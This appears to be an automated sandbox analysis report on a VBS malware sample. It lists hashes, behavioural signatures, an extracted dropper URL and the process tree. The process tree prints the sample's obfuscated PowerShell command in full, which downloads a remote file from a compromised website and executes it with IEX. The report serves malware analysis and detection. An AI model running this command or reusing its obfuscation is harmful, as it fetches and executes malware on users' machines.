Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
29/12/2024, 13:43
Static task
static1
Behavioral task
behavioral1
Sample
GVTCXYI83010.vbs
Resource
win7-20240708-en
5 signatures
150 seconds
General
-
Target
GVTCXYI83010.vbs
-
Size
844B
-
MD5
1414060f446d9dc216c622be120be514
-
SHA1
0f1ce25ce0451fdc55636346271bf09054e00fc0
-
SHA256
f43970ba4414ecdfe5d42fccb69528917e2fe58dbe684a009c455b1cfacfcb23
-
SHA512
2e340e98b733cfbef8b671263e3ebb0dafabefa97594ef3e3f59ee406a97075322ba411c5fa6d988e3e892b1bd5b582b4a66f2bce8978d5635b6c7334bdeb11e
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://www.boschtransport.co.za/wp-includes/.Final.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2612 powershell.exe 6 2612 powershell.exe -
pid Process 2612 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2612 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2612 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2596 wrote to memory of 2612 2596 WScript.exe 30 PID 2596 wrote to memory of 2612 2596 WScript.exe 30 PID 2596 wrote to memory of 2612 2596 WScript.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\GVTCXYI83010.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow__lo--tri__g'.replace('__','n').replace('--','adS'),[Microsoft.VisualBasic.CallType]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://www.boschtransport').Replace('################','.co.za/wp-includes/.Final.txt'))|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2612
-